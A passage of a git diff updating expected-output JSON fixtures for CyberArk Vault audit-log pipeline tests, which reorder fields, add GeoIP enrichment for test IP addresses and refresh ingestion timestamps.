- "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -657,6 +708,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -674,28 +730,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320180600Z", + "ingested": "2021-12-14T14:42:42.969875362Z", "original": "\u003c5\u003e1 2021-03-11T16:59:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:59:54\",\"IsoTimestamp\":\"2021-03-11T16:59:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -711,6 +771,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -728,28 +793,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320185600Z", + "ingested": "2021-12-14T14:42:42.969875766Z", "original": "\u003c5\u003e1 2021-03-11T16:59:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:59:55\",\"IsoTimestamp\":\"2021-03-11T16:59:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -765,6 +834,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -782,28 +856,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320191300Z", + "ingested": "2021-12-14T14:42:42.969876147Z", "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -819,6 +897,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -836,28 +919,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320197Z", + "ingested": "2021-12-14T14:42:42.969876547Z", "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -873,6 +960,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -890,28 +982,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320203Z", + "ingested": "2021-12-14T14:42:42.969877047Z", "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -927,6 +1023,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -944,14 +1045,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320208600Z", + "ingested": "2021-12-14T14:42:42.969877437Z", "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json index 56d1d0b1fb3..c813b54d4e4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json 
@@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-12-09T13:37:14.711383300Z", + "ingested": "2021-12-14T14:42:44.721462587Z", "original": "\u003c5\u003e1 2021-03-08T18:24:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:50\",\"IsoTimestamp\":\"2021-03-08T18:24:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAPrivateUserPrefs\",\"File\":\"Root\\\\YWRtaW5pc3RyYXRvcg==\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" @@ -65,6 +65,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -110,7 +119,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-12-09T13:37:14.711392300Z", + "ingested": "2021-12-14T14:42:44.721465024Z", "original": "\u003c5\u003e1 2021-03-10T18:44:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:44:08\",\"IsoTimestamp\":\"2021-03-10T18:44:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" @@ -123,6 +132,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -168,7 +186,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-12-09T13:37:14.711398Z", + "ingested": "2021-12-14T14:42:44.721465474Z", "original": "\u003c5\u003e1 2021-03-10T22:17:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:40\",\"IsoTimestamp\":\"2021-03-10T22:17:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" 
@@ -236,7 +254,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-12-09T13:37:14.711403400Z", + "ingested": "2021-12-14T14:42:44.721465847Z", "original": "\u003c5\u003e1 2021-03-11T19:45:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:45:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:45:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e98\u003c/MessageID\u003e\\n \u003cDesc\u003eOpen File (Write Only)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eOpen File (Write Only)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePVWAConfig\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PVConfiguration.xml\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eOpen File (Write Only)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:45:26\",\"IsoTimestamp\":\"2021-03-11T19:45:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write 
Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "98", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json index cd746dd1cb6..e43be8181f5 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "open file", - "ingested": "2021-12-09T13:37:15.063025200Z", + "ingested": "2021-12-14T14:42:45.155755773Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"99\",\"Desc\":\"Open File\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Open File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\EPMConfiguration.xml\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File\",\"GatewayStation\":\"\"}}}", "code": "99", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json index 18b20cc2947..e348d3e65e8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -42,14 +35,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-12-09T13:37:15.166336200Z", + "ingested": "2021-12-14T14:42:45.275562343Z", "original": "Mar 08 03:41:01 VAULT 